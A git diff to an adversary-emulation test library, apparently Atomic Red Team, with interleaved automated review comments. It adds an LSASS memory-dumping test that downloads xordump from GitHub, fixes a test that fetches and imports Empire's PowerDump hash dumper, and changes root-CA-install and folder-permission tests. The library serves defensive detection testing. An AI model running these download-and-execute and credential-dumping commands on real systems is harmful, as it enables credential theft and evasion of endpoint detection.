diff --git a/Gemfile.lock b/Gemfile.lock
index 96f60456..68078e7a 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -208,14 +208,14 @@ GEM
 rb-fsevent (~> 0.10, >= 0.10.3)
 rb-inotify (~> 0.9, >= 0.9.10)
 mercenary (0.3.6)
- mini_portile2 (2.5.0)
+ mini_portile2 (2.5.1)
 minima (2.5.1)
 jekyll (>= 3.5, < 5.0)
 jekyll-feed (~> 0.9)
 jekyll-seo-tag (~> 2.1)
 minitest (5.14.2)
 multipart-post (2.1.1)
- nokogiri (1.11.1)
+ nokogiri (1.11.4)
 mini_portile2 (~> 2.5.0)
 racc (~> 1.4)
 octokit (4.19.0)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8a3b34df..ef068f6f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -412,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
 defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
@@ -680,7 +681,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
 discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 2d4561e6..0aab232a 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
+defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
 defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
-discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt
+discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0d36ac..aed4c67a 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid
 credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
 credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
 credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d9a87458..d3f145a5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -450,6 +450,7 @@
 - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
 - Atomic Test #10: Powershell Mimikatz [windows]
 - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d2bd5efb..c3d3acfa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -50,6 +50,7 @@
 - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
 - Atomic Test #10: Powershell Mimikatz [windows]
 - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+ - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 71ce48ba..4b5c3fb2 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -20953,6 +20953,43 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} +' + name: powershell + elevation_required: true + - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + description: "The memory of lsass.exe is often dumped for offline credential + theft attacks. This can be achieved by\nimporting built-in DLLs and calling + exported functions. Xordump will re-read the resulting minidump \nfile and + delete it immediately to avoid brittle EDR detections that signature lsass + minidump files.\n\nUpon successful execution, you should see the following + file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n" + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: 'Computer must have xordump.exe + +' + prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" + -OutFile #{xordump_exe} + +' + executor: + command: "#{xordump_exe} -out #{output_file} -x 0x41\n" + cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore + ' name: powershell elevation_required: true 
@@ -22732,7 +22769,7 @@ credential-access: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true @@ -32908,7 +32945,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. @@ -32941,7 +32978,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. @@ -32957,7 +32994,7 @@ defense-evasion: "#{cert_filename}" ' - name: command_prompt + name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 
@@ -42958,8 +42995,27 @@ defense-evasion: description: Path of folder to recursively set permissions on type: path default: C:\Users\Public\* + file_path: + description: Path of folder permission back + type: Path + default: "%temp%\\T1222.001-folder-perms-backup.txt" + dependency_executor_name: command_prompt + dependencies: + - description: 'Backup of original folder permissions should exist (for use + in cleanup commands) + +' + prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) + +' + get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 + +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q + cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 + +' name: command_prompt elevation_required: true T1220: @@ -48719,7 +48775,7 @@ discovery: supported_platforms: - macos executor: - name: command_prompt + name: sh elevation_required: false command: |- /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index aad552e0..26822e04 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -48,6 +48,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe) +- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls) +
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec +
+
+ +## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by +importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump +file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + +Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe| +| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +#{xordump_exe} -out #{output_file} -x 0x41 +``` + +#### Cleanup Commands: +```powershell +Remove-Item ${output_file} -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must have xordump.exe +##### Check Prereq Commands: +```powershell +if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} +``` + + + +
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 2014b6e2..eb902b08 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -138,6 +138,7 @@ atomic_tests: del C:\windows\temp\dumpert.dmp >nul 2> nul name: command_prompt elevation_required: true + - name: Dump LSASS.exe Memory using Windows Task Manager auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 description: | @@ -158,6 +159,7 @@ atomic_tests: 3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. name: manual + - name: Offline Credential Theft With Mimikatz auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 description: | 
@@ -354,3 +356,37 @@ atomic_tests: del #{output_file} name: powershell elevation_required: true + +- name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by + importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump + file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + + Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: | + Computer must have xordump.exe + prereq_command: | + if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} + executor: + command: | + #{xordump_exe} -out #{output_file} -x 0x41 + cleanup_command: | + Remove-Item ${output_file} -ErrorAction Ignore + name: powershell + elevation_required: true diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index d2b817bc..1516c1da 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md 
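Review bot: The new test's cleanup, `Remove-Item ${output_file} -ErrorAction Ignore`, uses PowerShell variable syntax instead of the `#{output_file}` input placeholder, so at run time it refers to an undefined variable, passes an empty path, and `-ErrorAction Ignore` most likely masks the resulting error, leaving the dump file on disk; it should read `Remove-Item "#{output_file}" -ErrorAction Ignore`. The description tells the reader to look for `$env:TEMP\lsass-xordump.t1003.001.dmp`, while the `output_file` default is `C:\Windows\Temp\lsass-xordump.t1003.001.dmp`; the two should name the same location. `get_prereq_command` downloads `xordump.exe` into `C:\Windows\Temp` with no integrity check and nothing removes it afterwards, so consider comparing its SHA-256 with a pinned value (`<expected-sha256>` placeholder) after the download and deleting `#{xordump_exe}` in the cleanup step, or at least documenting that the binary persists after the test. The same text is duplicated in the generated `index.yaml` hunk at `@@ -20953,6 +20953,43 @@` and in `T1003.001.md`, which should be regenerated once the source YAML is corrected.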
@@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry. Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" -Import-Module .\PowerDump.ps1 +Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump ``` diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 081107a1..958fac22 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -94,7 +94,7 @@ atomic_tests: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 576c3ad0..def6c2c7 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -224,6 +224,7 @@ You can set your own path variable to "C:\*" if you prefer. | Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of folder to recursively set permissions on | path | C:\Users\Public\*| +| file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) 
@@ -233,9 +234,25 @@ You can set your own path variable to "C:\*" if you prefer. icacls "#{path}" /grant Everyone:F /T /C /Q ``` +#### Cleanup Commands: +```cmd +icacls '#{path}' /restore #{file_path} /q >nul 2>&1 +``` +#### Dependencies: Run with `command_prompt`! +##### Description: Backup of original folder permissions should exist (for use in cleanup commands) +##### Check Prereq Commands: +```cmd +IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) +``` +##### Get Prereq Commands: +```cmd +icacls #{path} /save #{file_path} /t /q >nul 2>&1 +``` + +
diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml index 4f03b7de..1d80a6f2 100644 --- a/atomics/T1222.001/T1222.001.yaml +++ b/atomics/T1222.001/T1222.001.yaml @@ -132,7 +132,21 @@ atomic_tests: description: Path of folder to recursively set permissions on type: path default: 'C:\Users\Public\*' + file_path: + description: Path of folder permission back + type: Path + default: '%temp%\T1222.001-folder-perms-backup.txt' + dependency_executor_name: command_prompt + dependencies: + - description: | + Backup of original folder permissions should exist (for use in cleanup commands) + prereq_command: | + IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) + get_prereq_command: | + icacls #{path} /save #{file_path} /t /q >nul 2>&1 executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q + cleanup_command: | + icacls '#{path}' /restore #{file_path} /q >nul 2>&1 name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 5b210391..7925bb5f 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `sh`! -```cmd +```sh /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist ``` diff --git a/atomics/T1518/T1518.yaml b/atomics/T1518/T1518.yaml index e42eefd3..c6a329a9 100644 --- a/atomics/T1518/T1518.yaml +++ b/atomics/T1518/T1518.yaml @@ -33,7 +33,7 @@ atomic_tests: supported_platforms: - macos executor: - name: command_prompt + name: sh elevation_required: false command: | /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist 
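Review bot: The new `cleanup_command`, `icacls '#{path}' /restore #{file_path} /q >nul 2>&1`, wraps the directory in single quotes, but this executor is `command_prompt`, where single quotes are ordinary characters, so icacls receives the literal quoted string; the attack command on the line above uses double quotes and the cleanup should match it: `icacls "#{path}" /restore #{file_path} /q >nul 2>&1`. Because both the `/save` in `get_prereq_command` and the `/restore` discard all output to `nul`, a failed restore leaves the Everyone:F grant in place with no indication, so it is worth running the cleanup once by hand to confirm that `/restore` accepts the wildcard form of the default `path` (I have not verified this). The description of the new `file_path` argument, `Path of folder permission back`, reads as a truncated sentence; `Path of the file holding the backup of the original folder permissions` says what it is. The same cleanup and description appear in the `T1222.001.md` hunk and in the generated `index.yaml` hunk at `@@ -42958,8 +42995,27 @@`.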
diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 43e59df9..c17ef4a6 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -90,14 +90,14 @@ echo sudo update-ca-certificates -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` @@ -123,24 +123,24 @@ Creates a root CA with openssl | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) -```cmd +```sh sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" ``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index d3663bc7..668dc4fe 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml 
@@ -44,7 +44,7 @@ atomic_tests: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: | Verify the certificate exists. It generates if not on disk. @@ -74,7 +74,7 @@ atomic_tests: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: | Verify the certificate exists. It generates if not on disk. @@ -86,7 +86,7 @@ atomic_tests: executor: command: | sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - name: command_prompt + name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index eba1dedd..d80b426b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d e86f1b4b-fcc1-4a2a-ae10-b49da01458db 10447c83-fc38-462a-a936-5102363b1c43 fcbdd43f-f4ad-42d5-98f3-0218097e2720 +86fc3f40-237f-4701-b155-81c01c48d697